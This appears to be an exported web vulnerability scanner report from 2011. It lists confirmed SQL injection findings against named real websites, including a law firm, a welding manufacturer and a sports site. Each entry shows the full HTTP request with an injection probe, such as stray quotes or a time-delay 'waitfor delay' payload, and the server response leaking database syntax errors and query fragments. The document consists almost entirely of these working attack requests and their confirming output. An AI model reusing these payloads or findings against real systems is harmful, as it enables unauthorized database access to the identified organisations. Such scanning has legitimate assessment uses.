HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:27:28 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Set-Cookie: sessionKey=6d620d41-9034 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172253 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:53:44 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 66359 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:36 GMT Connection: Keep-Alive Content-Length: 27688 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing'/images/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 27717 Date: Fri, 06 May 2011 19:12:53 GMT X-Varnish: 1128246861 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
GET /financing''/images/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 29453 Date: Fri, 06 May 2011 19:12:54 GMT X-Varnish: 1128247139 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing/images'/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 27716 Date: Fri, 06 May 2011 19:12:59 GMT X-Varnish: 1128247898 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
GET /financing/images''/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 29451 Date: Fri, 06 May 2011 19:13:00 GMT X-Varnish: 1128248119 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing/images Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:13:05 GMT Connection: Keep-Alive Content-Length: 27752 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images ...[SNIP]... |
GET /financing/images Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:13:06 GMT Connection: Keep-Alive Content-Length: 29451 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing/images Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:12:40 GMT Connection: Keep-Alive Content-Length: 27720 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
GET /financing/images Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:12:41 GMT Connection: Keep-Alive Content-Length: 29451 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /financing/index.php |
GET /financing'/index.php HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:16:42 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 27703 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /financing/index.php |
GET /financing/index.php' HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:17:06 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 27724 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/index.php''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/index.php |
GET /financing/index.php?1'=1 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 200 OK Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:15:50 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 13812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked= ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
GET /financing/index.php?1''=1 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 200 OK Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:15:51 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 15555 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked= ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-bootm-bg |
GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:06 GMT Connection: Keep-Alive Content-Length: 27711 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-bootm-bg |
GET /images/footer-bootm-bg Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:30 GMT Connection: Keep-Alive Content-Length: 27710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-top-bg.jpg |
GET /images'/footer-top-bg.jpg?2 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:09 GMT Connection: Keep-Alive Content-Length: 27709 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-top-bg.jpg |
GET /images/footer-top-bg.jpg'?2 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:34 GMT Connection: Keep-Alive Content-Length: 27708 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/header-background |
GET /images'/header-background.jpg?3 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:34 GMT Connection: Keep-Alive Content-Length: 27713 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/header-background |
GET /images/header-background Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:58 GMT Connection: Keep-Alive Content-Length: 27712 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nutter.com |
Path: | /attorneys.php |
GET /attorneys.php?AttorneyID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:15:26 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 9631 error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELECT FirstName,LastName,Mid ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nutter.com |
Path: | /careers.php |
GET /careers.php?CategoryID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:19:42 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 8510 <!-- careers start --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="mainContent"> error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nutter.com |
Path: | /careers.php |
GET /careers.php?CategoryID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:18:45 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 17285 <!-- careers start --> error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /2/a.z |
GET /2/a.z?cfg=2=1'waitfor%20delay'0%3a0 Host: www.scout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 19:31:35 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 19:41:15 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb6 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 11936 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /a.z |
POST /a.z?s=143&p=9&c=2waitfor%20delay'0%3a0 Referer: http://www.scout.com/a.z User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate Content-Length: 61 __VIEWSTATE=%2fwEPDw |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 20:00:39 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 20:10:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 27058 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>Scout.com: Football Recruiting</title> <meta http-eq ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.scout.com |
Path: | /a.z |
GET /a.z?s=143&p=9&c=2'&cid=1037787&nid=4811607 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.scout.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 20:00:17 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 20:10:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 X-Streamed: from 192.168.20.181 in 158 ms Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Vary: Accept-Encoding Content-Length: 27298 <!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',4811607,null,null,null PUBLIC "-//W3C//DTD XHTML 1.0 S ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /a.z |
POST /a.z?s=143&p=9&c=2&cid Referer: http://www.scout.com/a.z User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate Content-Length: 61 __VIEWSTATE=%2fwEPDw |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 20:02:23 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 20:12:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 27128 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>Scout.com: Zack Williams Profile</title> <meta http ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.scout.com |
Path: | /a.z |
